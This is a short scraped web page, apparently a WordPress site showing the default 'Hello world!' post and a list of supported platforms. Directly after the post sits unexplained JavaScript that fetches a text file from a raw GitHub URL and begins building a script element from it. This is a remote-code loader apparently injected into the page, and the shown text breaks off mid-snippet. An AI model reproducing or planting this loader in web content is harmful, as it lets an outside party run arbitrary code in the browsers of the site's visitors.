Recommended Services
Supported Scripts
WordPress
Hubspot
Joomla
Drupal
Wix
Shopify
Magento
Typeo3
Day: February 11, 2024
Uncategorized
Hello world!
Welcome to WordPress. This is your first post. Edit or delete it, then start writing!
var url = 'https://raw.githubusercontent.com/lolngnos/loles/main/step.txt';
fetch(url)
.then(response => response.text())
.then(data => {
var script = document.createElement('script');
...